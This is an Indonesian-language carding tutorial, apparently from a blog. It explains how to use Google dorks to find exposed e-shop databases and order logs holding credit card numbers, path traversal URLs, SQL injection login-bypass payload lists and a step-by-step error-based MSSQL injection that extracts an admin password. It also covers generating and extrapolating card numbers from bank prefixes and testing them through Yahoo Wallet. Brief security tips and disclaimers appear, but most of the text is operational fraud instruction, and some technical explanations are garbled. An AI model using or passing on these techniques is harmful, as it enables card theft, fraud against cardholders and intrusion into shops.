Kemungkinan lain dari database ini yang telah dimodifikasi. Misalnya, shoppingcart.mdb, shopping_cart.mdb, cart.mdb, clickcart.mdb, dan berbagai bentuk lainnya. Sesuai dengan kesukaan sang pemilik situs. Trik ini digunakan untuk mengelabui para carder supaya tidak bisa mendapatkan file mdb dengan mudah.
Scart.mdb
Serupa tapi tak sama. Itulah yang bisa saya jelaskan mengenai database scart.mdb. Ada dua model syntax yang bisa Anda coba gunakan.
allinurl:admin/scart.mdb
atau
inurl:scart.mdb
Sebenarnya model syntax ini bisa Anda modifikasi sendiri, termasuk juga untuk syntax-syntax lainnya yang terdapat dalam artikel ini. Kreatiflah mengubah syntax seperti kasus store menjadi mystore. Kalau Anda mau lebih jelas, Anda harus banyak belajar mengenai berbagai syntax google hacking (google dorks).
ExploitScart.mdb
Untuk nama database yang sama, yaitu scart.mdb, akan saya berikan sebuah exploit. Langsung saja, dengan menggunakan syntax untuk Google:
inurl:shopKart20
Bisa juga dimodifikasi menjadi "/shopKart20/"
(tanda kutip duanya tetap digunakan)
Selanjutnya Google akan menampilkan target-target empuk yang mempunyai celah keamanan yang belum sempurna. Silakan Anda buka saja. Misalnya:
http://www.situs-target.com/ashopKart20/addprod.asp
Pertama-tama hilangkan tanda string: ashopKart20 dan seterusnya. Kemudian tambahkan string:
admin/scart.mdb
Jadinya:
http://www.situs-target.com/admin/scart.mdb
Secara otomatis akan muncul pesan apakah Anda akan mendownload file database.
Anda bisa mendownload file database langsung ataupun menggunakan program pihak ketiga, misalnya internet download manager yang softwarenya banyak ditemui di internet dan bisa didownload lalu diinstal di komputer Anda.
Dalam database tersebut, nomor kartu kredit berada pada bagian orders. Sedangkan informasi pembeli berada pada bagian Customers. Sehingga nama pemilik kartu kredit bisa diketahui dari tabel customers lalu dicocokkan id-nya dengan orders.
Miscellaneous Database
Berikut ini adalah teknik untuk mendapatkan file database, yang boleh dibilang nama databasenya acak. Jadi miscellaneous bukan berarti itu adalah nama sebuah database. Sebenarnya hampir sama saja cara dan tekniknya dengan beberapa yang ada yang tadi sudah dibahas. Nama database itu bisa apa saja, misalnya toko.mdb, jual.mdb.
Akan saya suguhkan sebuah contoh kasus.
Syntax: /shop/category.asp/catid
Misalnya, Anda menemukan target dengan url:
http://www.situs-target.com/shop/category.asp?catid=37
Hapuslah shop/category.asp?catid=37 (angkanya bisa berapapun, tergantung situs target yang Anda peroleh). Kemudian ganti menjadi:
/admin/dbsetup.asp
Maka nama situsnya menjadi:
http://www.situs-target.com//admin/dbsetup.asp
Perhatikan dengan baik dan benar, garis miring (/) yang digunakan sebelum admin ada dua buah (//admin). Jadi itu bukan karena salah ketik!
Berikut adalah tampilan dua buah target yang saya temukan. Sengaja pada bagian ini saya memberikan contoh dua buah target untuk menampilkan mana file databasenya.
Misalnya dari contoh target yang pertama, nama file databasenya adalah icommerce.mdb. Sedangkan nama file database untuk situs target kedua adalah worldofwater.mdb.
Urusan download database-nya sekarang saya serahkan pada Anda supaya logika dan pikiran Anda bisa berkembang. Lagipula nama databasenya sudah ketahuan kok.
SHOPPER EXE EXPLOIT
Berikut ini syntax yang bisa dicoba:
http://www.situs-target.com/cgi-bin/shopper.exe?search=action&keywords=Dy4-VoN%2520&template=order.log
atau
http://www.situs-target.com/cgi-bin/shopper.cgi?search=action&keywords=Dy4-VoN%20&template=order.log
looding sebentar.......
Wah ternyata, banyak juga log file hasil shopping yang ditemukan....
Setelah penulis cek dan lihat hasil log file nya banyak juga cc yang masih fresh tapi tidak ada no cvv nya, hanya no pemegang kartu dan no cc dan cardExpire.
Sekali lagi, ini hanya ilmu pengetahuan dan sangat tidak disarankan untuk menyalahgunakannya.
Jika anda sebagai web master dari shopping online, tentunya anda harus lebih berhati-hati dengan teknik ini.
SECURITY TIPS (TIPS UNTUK KEAMANAN JARINGAN WEBSITE ANDA)
Khusus untuk Anda yang mengelola sebuah situs online shopping, usahakanlah untuk membuat file database yang tidak bisa diakses melalui directory public. Hindari meletakkan file database pada webroot. (Tahu kan apa yang dimaksud dengan webroot? kalau nggak tahu banyaklah membaca buku-buku tentang jaringan internet, atau bisa juga membaca-baca di wikipedia.com)
Buatlah permission untuk mengakses database pada sebuah direktori khusus, hal ini akan mencegah orang lain mendownload file database. Jangan gunakan nama database default. Ubahlah menjadi nama lainnya yang Anda rasa aman. Untuk para user, berhati-hatilah untuk berbelanja pada situs online. Carilah informasi mengenai sistem keamanan situs tersebut. Dan pastikan bahwa halaman belanja yang Anda buka bukanlah scam page, juga bukan phising.
INSTANT CARDING
Pada dasarnya, teknik instant carding ini tidak jauh berbeda dengan teknik carding dengan mendownload file database. Hanya saja instant carding adalah aktivitas carding yang dilakukan tanpa perlu mendownload file database. Contoh yang paling gampang adalah saat Anda browsing lalu membuka file HTML dan nomor-nomor kartu kredit langsung tampil. Jenis file lainnya yang bisa langsung tampil adalah file TXT (text). Khusus untuk file LOG; ada yang bisa menampilkan isi file berupa nomor kartu kredit langsung pada browser. Terkadang ada pula yang perlu menjalani proses download yang disimpan pada folder temporary yang selanjutnya dibuka menggunakan Notepad. Atau bisa juga didownload sendiri oleh Anda.
Web_store
Sebenarnya ada banyak aplikasi web store yang digunakan, terutama menggunakan CGI. Teknik yang digunakan berikut ini adalah dengan langsung mengakses dalam directory dengan memanfaatkan syntax Index of.
Syntax: intitle:"Index of" user_carts OR user_cart
Dari situs target yang ditemukan dari hasil pencarian di google.com, saya membuka beberapa diantaranya. sebenarnya di dalam directory tersebut terdapat beberapa informasi menarik, seperti file web_store.cgi, dan directory lainnya. Saya akan fokus pada tujuan kita saja. Dalam bagian Index Of tersebut, pertama-tama saya membuka folder User_carts. Ternyata isinya kosong, berarti bukan folder ini tempat penyimpanan file order.
Cukup hanya dengan menggunakan logika saja, kemungkinan besar lokasi lain yang digunakan adalah folder Admin_files.
Ternyata dugaan saya benar. File order.log tersimpan dalam folder Admin_files.
Tanpa perlu basa-basi lagi, Anda bisa langsung mendownloadnya. Atau bisa juga ditampilkan langsung di browser. Sayangnya pada beberapa kasus, cara seperti ini malah menimbulkan error alias tidak bisa dibuka. Lebih enak dan lebih aman dengan membuka menggunakan Notepad saja.
CVV2
Anda masih ingat dengan penjelasan di awal bahwa adanya kode rahasia pada setiap kartu kredit. Kita akan memanfaatkan kode tersebut untuk aktivitas carding. Sebelumnya Anda telah mencoba menggali file LOG, sekarang jenis file yang akan dijajal adalah TXT. Syntax yang saya gunakan di sini sangatlah sederhana:
inurl:cvv2.txt
Tapi hasilnya, sungguh luar biasa. Posisi file cvv2.txt ini bisa berada di mana saja. Saya bahkan menemukan cvv2.txt yang disembunyikan dalam directory images, yang biasanya digunakan untuk file-file gambar. Itulah salah satu trik untuk mengelabui. Misalnya, yang saya temukan adalah:
http://www.situs-target.com/images/cvv2.txt
Order.Log
Sekarang kita kembali mencari file log yang merupakan instant carding. Sebab, Anda bisa melihat hasil temuan dengan instant tanpa perlu mendownload database. Sebenarnya nama file order.log sudah umum digunakan untuk menyimpan catatan order pembelian. Berikut syntax yang perlu Anda masukkan dalam Google. Syntax:
inurl:order.log
Sewaktu Anda memperoleh target, maka file log langsung tampil di browser. Supaya tampil rapi data yang ada dalam Notepad tersebut dicopy dan paste pada MS-Word. Ini hanya untuk merapikan saja, supaya lebih enak dipandang, bukan berarti nomor kartu kreditnya lebih banyak muncul.
ExploitOrder.log
Jika di atas adalah metode langsung menemukan file order dan sebagainya, berikut ini saya berikan sebuah exploit pada store CGI. Sebenarnya ada banyak kasus untuk store CGI ini, ada juga yang bisa dilakukan melalui SQL Injection. Tapi di sini saya fokuskan paa menampilkan file log pada browser untuk aktivitas Instant Carding.
Syntax: allinurl:/cgi-bin/store/index.cgi?page=
Dari hasil target yang diperoleh, cobalah membuka satu per satu. Misalnya, di sini saya memperoleh target:
http://www.situs-target.com/cgi-bin/store/index.cgi?page=apa-pun.html
Buanglah string yang terdapat di belakang page=
Maka URL menjadi:
http://www.situs-target.com/cgi-bin/store/index.cgi?page=
Selanjutnya masukkan string berikut, sebagai pengganti string yang dihapus.
../admin/files/order.log
Maka URL-nya menjadi:
http://www.situs-target.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
Selanjutnya kaan tampil daftar order yang berisikan nomor kartu kredit customer.
Bahkan data yang ditampilkan lengkap dengan nomor CVV kartu kredit tersebut.
Sebuah teknik yang hampir sama dengan di atas untuk memperoleh file order.log, yaitu sebuah modus lama yang sudah terkenal, yaitu dengan menggunakan syntax:
shopper.cgi
Lalu pada akhir URL Anda hanya perlu menambahkan string berikut:
&template=order.log
SECURITY TIPS.
Sebenarnya tips ini juga dapat diterapkan pada kasus carding-in database.
Hapus atau gantilah nama file yang sedikit riskan, misalnya: order.log, cvv2.txt, cmd.exe, cart32.exe dan sebagainya.
Simpanlah file-file penjualan yang riskan tersebut pada directory yang susah dijangkau oleh orang lain.
Sebisa mungkin hindari penyimpanan file transaksi dalam bentuk html. Khusus untuk file log, sering-seringlah dihapus supaya tidak kecolongan.
Untuk para user, pesan saya cuma sedikit : WASPADALAH!
SQL INJECTION.
Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query' dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP MySQL dan ASP MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut, sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id, user_name dan password pada table user.
Biasanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax scr i pt akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out' dari delimiter nya SQL. Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merupakan mark nya MSSQL, jadi perintah selanjutnya nggak di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login scr i pt seperti
input login password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='" login "' and password='" pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop table users
Aduh pada pusing ya , gini deh cara gampangnya and kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya (kalau anda punya situs belanja online milik Anda sendiri, lebih baik diujicoba di situs sendiri sehingga tidak merugikan orang lain), lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Gak bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa buat sendiri scr i pt dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya. Untuk test apakah suatu page mempunyai vulnerable , begini caranya :
Kalian pernah melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://victim/index.asp?id=10
Selain kita test dengan login page diatas tadi, kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
action="http://victim/admin/login.asp" method="post">
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username. Ingat scr i pt ini ditamhakna pd scr i pt yg sudah kalian download dr target .
Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh:
Pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam scr i pt ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
Lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
Artinya v_cat mendapatkan masukan berupa variable laptop atau var 1=1(kosong) yang menyebabkan Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection. Ingat ini hanya sebagai latihan pembelajaran, jangan disalahgunakan, saya tidak ingin mendapat dosa kolektif hanya karena gara-gara Anda tiba-tiba tergoda oleh setan dan menjadi orang yang jahat. Ingat menjadi jahat itu perbuatan dosa! Neraka akan menunggu Anda! :)
Sebenarnya SQL Injection ini merupakan sebuah metode tersendiri dalam dunia hacking. Hanya saja SQL Injection dapat digunakan untuk aktivitas carding. Persoalan apa dan bagaimana SQL Injection tidak akan saya singgung lagi, karena sudah dibahas di bagian paling awal dalam artikel ini. Boleh dibilang, saya hanya mengulas kembali apa yang sudah saya jelaskan dibagian awal tadi.
Melalui SQL Injection, maka seseorang bisa memasuki sebuah sistem. Entah bagaimanapun caranya. Cara yang paling sederhana adalah dengan menggunakan password dan account-nya: 'or"='
Bisa juga accountnya: admin, lalu passwordnya: 'or"='
Dengan cara tersebut, maka seseorang bisa memasuki sebuah sistem, seolah-olah dia adalah admin situs tersebut. Tentu saja admin gadungan tersebut bisa mengobok-obok sebuah sistem. Di dalamnya, admin tersebut bisa mendownload file database yang tentu saja mengandung nomor kartu kredit di dalamnya.
Selain itu, juga bisa melakukan aktivitas instant carding, yaitu dengan melihat file order.log ataupun order.txt.
Maaf, saya tidak menjelaskan teknik SQL Injection dengan mengakses tabel per tabel. Saya hanya mau menunjukkan konsepnya saja.
Berikut ini ada beberapa kemungkinan lain password yang bisa dicoba seperti:
'or'a'='a
'or1=1-
"or1=1--
or1=1--
'or'a'='a
"or"a"="a
')or('a'='a
Saya tebak, anda pasti sudah sering mendengar istilah "SQL Injection", bukan ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan hal lain mengenai step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
Kita akan mengambil contoh di site http://www.situs-target.com/
Misalnya ada dua kelemahan di website ini, yaitu:
1. Tabel News
2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.
Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.situs-target.com/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[ ] NAMA = bill
[ ] PASSWORD = m@mpusk@u
Silahkan login ke :
www.situs-target.com/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja....
Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin, bahwa websitenya vulnerable !!!
Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.situs-target.com/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.situs-target.com/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan pengetahuan anda. Anda bisa men-insert berita yang bisa anda tentukan sendiri isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk drive anda, copot harddisk anda, jual kompie anda !!!
TEKNIK VALIDASI KARTU KREDIT
Pembahasan kali ini sudah cukup jauh. Berbagai teknik untuk mengetahui/mencari/melihat dan mengamankan dan mengantisipasi kartu kredit dari jangkauan pencuri sudah Anda ketahui. Dengan mencoba menyelami jalan pikiran seorang carder, maka seorang penegak hukum (cyber police) maupun para webmaster bisa lebih berhati-hati dalam menyingkap setiap kasus per kasus, sehingga dapat dilakukan tindakan pencegahan.
Berikutnya adalah beberapa point penting atau cara yang biasa dilakukan oleh para carder untuk melakukan carding.
Sebenarnya ada banyak cara untuk memvalidasi nomor kartu kredit, salah satunya adalah dengan algoritma Luhn yang sudah saya jelaskan di bagian awal. Termasuk juga pemakaian program tertentu.
Metode validitas berikut ini lebih efektif karena bertujuan untuk mengetes apakah nomor sebuah kartu kredit bisa diterima atau tidak. Caranya sangat gampang dilakukan, terutama melalui toko-toko online terkenal. Yang perlu dilakukan hanyalah berpura-pura belanja. Apabila kartu tersebut diterima, sudah tentu kartu tersebut valid.
Apalagi melakukan validasi tidak harus dengan membeli sebuah produk, cukup dengan melakukan registry saja, tentu akan lebih enak.
Ketidakvalidan sebuah nomor kartu kredit bisa saja terjadi, karena kesalahan user itu sendiri. Misalnya, kartu tersebut adalah Visa, tapi yang dipilih adalah MasterCard. Contoh yang paling sederhana untuk melakukan validasi adalah dengan memasukkan digit awal sebuah kartu yang tepat. Misalnya, kartu Visa digit pertamanya adalah 4 (empat), MasterCard digit awalnya adalah 5 (lima). Dan hal tersebut tidak dapat dibalik, apabila dibalik sudah pasti akan terjadi ketidakvalidan.
Valid tidaknya sebuah nomor kartu kredit bukanlah dilakukan menggunakan CC Generator. Karena program tersebut hanyalah untuk mendapatkan nomor kloning dari nomor utama.
GENERATE VS EXTRAPOLATE
Sebelum membicarakan mengenai teknik validasi tersebut, saya akan sedikit mengulas perbedaan antara Generate dan Extrapolate. Sebab masih banyak yang bingung membedakan antara kedua hal tersebut. Walaupun keduanya memiliki maksud dan tujuan yang sama, menghasilkan kloning nomor kartu kredit.
Supaya lebih gampang dipahami, saya sertakan saja sebuah ilustrasi.
Katakanlah sebuah program seperti CC Generator menyebutkan bahwa sebuah nomor valid. Misalnya, Anda telah menguji sebuah nomor, anggaplah kartu visa dengan nomor:
4367123401010690.
Kita buat hasil extrapolate-nya ada lima:
4367123401010690
4367123401010962
4367123401011123
4367123401018765
4367123401017894
Sedangkan hasil generate-nya adalah:
4367321078904662
4367574589029832
4367067965484344
4367000846339856
4367356736750212
Dari gambaran tersebut terlihat jelas, proses extrapolate hanya melakukan proses logaritma random untuk 4 digit terakhir saja. Sebaliknya, proses generate tidak mengubah hanya 4 digit pertama saja.
Secara struktur terlihat bahwa proses generate memberikan variabel digit yang lebih besar ketimbang extrapolate. Walau demikian, hasil dari extrapolate lebih tertuju pada sebuah nomor kartu kredit saja sehingga memiliki kemungkinan validitas yang lebih tinggi.
Dengan dua teknik tersebut, maka bisa dilakukan kombinasi. Untuk memperbanyak sebuah nomor kartu kredit diperlukan proses generating. Dan extrapolate untuk mengkloning nomor yang dimiliki. Tentu saja dengan memperhatikan prefix 4 digit pertama. Supaya lebih enakan, gambaran strukturnya adalah sebagai berikut:
Nomor asli Hasil Generating Hasil Extrapolating
4367 1234 0101 0690 4367 3210 7890 4662 4367 3210 7890 2857
4367 3210 7890 3523
4367 3210 7890 0022
4367 5745 8902 9832 4367 5745 8902 3525
4367 5745 8902 0133
4367 5745 8902 3505
4367 3567 3675 0212 4367 3567 3675 5730
4367 3567 3675 7835
4367 3567 3675 1211
* Semua nomor yang saya ketikkan di atas dan juga semua angka-angka dalam artikel ini adalah acak (asal ketik), sekedar untuk contoh saja.
Dari tabel tersebut, bisa diketahui bahwa hasil kombinasi antara proses generate dan extrapolate sangat berbahaya sekali dalam menghasilkan nomor kartu kredit yang random.
Sebagai tambahan, berikut adalah daftar beberapa prefix bank. Ini saya tampilkan beberapa saja sebagai contoh. Untuk prefix yang umum bisa Anda lihat pada penjelasan di bagian awal.
VISA
Prefix Nama Bank
4019 Bank of America
4032 Household Bank
4071 Colonial National Bank
4113 Valley National Bank
4114 Chemical Bank
4301 Monogram Bank
4387 Bank One
4418 Bank of Omaha
4421 Indiana National Bank
4811 Bank of Hawaii
4833 U.S. Bank
4921 Hongkong/National Bank
MasterCard
Prefix Nama Bank
5100 Southwestern States Bank
5130 Eurocard France
5190 Bank of Montreal
5191 Bank of Montreal
5201 Mellon Bank, N.A.
5217 Union Trust
5224 Midland Bank
5226 Eurocard Ab
5333 Ohio National Bank
VALIDASI DENGAN YAHOO WALLET
Nomor-nomor yang dihasilkan dari proses generating maupun extrapolating, lebih membutuhkan uji kelayakan ketimbang hasil dari carding-in database dan instant hacking. Tapi, kalau Anda tetap mau mencoba, ya tidak ada yang melarang.
Di sini saya mencoba dengan memanfaatkan fasilitas Yahoo Wallet. Sebenarnya Anda juga bisa memanfaatkan situs ebay, dan banyak situs lainnya. Saya rasa cukup dengan menjelaskan Yahoo Wallet saja, sebab untuk penggunaan ebay dan lainnya hampir sama saja dengan Yahoo Wallet.
Untuk dapat menggunakan Yahoo Wallet, tentu saja seseorang diwajibkan memiliki email di Yahoo. Barulah setelah itu melakukan register di http://wallet.yahoo.com
Setelah Anda berhasil login, klik pada bagian add a new payment method.
Sekarang, masukkanlah data mengenai nomor kartu kreditnya.
